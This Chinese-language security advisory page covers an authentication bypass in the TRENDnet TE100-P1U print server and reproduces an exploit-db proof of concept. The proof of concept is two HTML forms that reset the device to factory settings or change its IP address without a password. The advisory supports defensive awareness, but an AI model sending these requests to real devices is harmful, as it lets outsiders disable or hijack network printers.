首页 -> 安全研究
安全研究
安全漏洞
TRENDnet TE100-P1U 打印服务器 4.11 身份验证绕过漏洞
发布日期:2013-06-23
更新日期:2013-06-25
受影响系统:
trendnet TE100-P1U 4.11描述:
BUGTRAQ ID: 60727
TRENDnet TE100-P1U是一款打印服务器,可转换任何独立USB网络打印机为共享网络打印机。
TRENDnet TE100-P1U 固件4.11版本和其他版本存在多个身份验证绕过漏洞,攻击者可利用这些漏洞绕过身份验证机制并执行未授权操作。
<*来源:Chako
链接:http://www.exploit-db.com/exploits/26401/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#
# Exploit Title: TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability
# Date: 2013/6/20
# Exploit Author: Chako
# Firmware Version: 4.11
# Tested on: Windows 7
#############################################################
Description:
=====================
A remote authentication bypass vulnerability affects TRENDnet TE100-P1U Print Server.
This issue is due to a failure of the application to validate authentication
credentials when processing print server configuration change requests.
An attacker could reset print server to factory sttings or changeing its IP address without
password security check.
Exploit:
=====================
1)Reset Print Server To Factory Settings
<form action="http://IP/Reply.htm" method="POST">
<table border="0" cellpadding="3" cellspacing="0" width="100%">
<tbody><tr><td class="headerbg">Factory Reset</td></tr>
</tbody></table>
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
</tbody></table><br>
<input name="Factory" value=" Yes " type="submit" width="60">
</form>
1)Change Print Server IP Address
<form action="http://IP/Network.htm" method="POST">
<table border="0" cellpadding="3" cellspacing="0" width="100%">
<tbody><tr><td class="headerbg">Change IP Address</td></tr>
</tbody></table>
<table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr>
<td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
<td bgcolor="#F0F0F0" valign="top">
<table border="0">
<tbody><tr><td>
<input name="IP_ASSIGN" value="1" type="radio">Manually Assign
<table border="0" cellpadding="3" cellspacing="0">
<tbody><tr>
<td width="20"></td><td>IP Address</td>
<td>: <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
</tr>
<tr>
<td></td><td>Subnet Mask</td>
<td>: <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
</tr>
<tr>
<td></td><td>Default Gateway</td>
<td>: <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
</tr>
</tbody></table>
</td></tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<table border="0" cellpadding="5" cellspacing="1" width="100%">
<tbody><tr>
<td height="50" width="149"> </td>
<td width="355"> <input name="Config2" value=" Save " type="submit" width="80"> <input value="Cancel" type="reset" width="80"></td>
</tr>
</tbody></table>
</form>
建议:
厂商补丁:
trendnet
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.trendnet.com/products/proddetail.asp?prod=130_TE100-P1U
浏览次数:3947
严重程度:0(网友投票)
绿盟科技给您安全的保障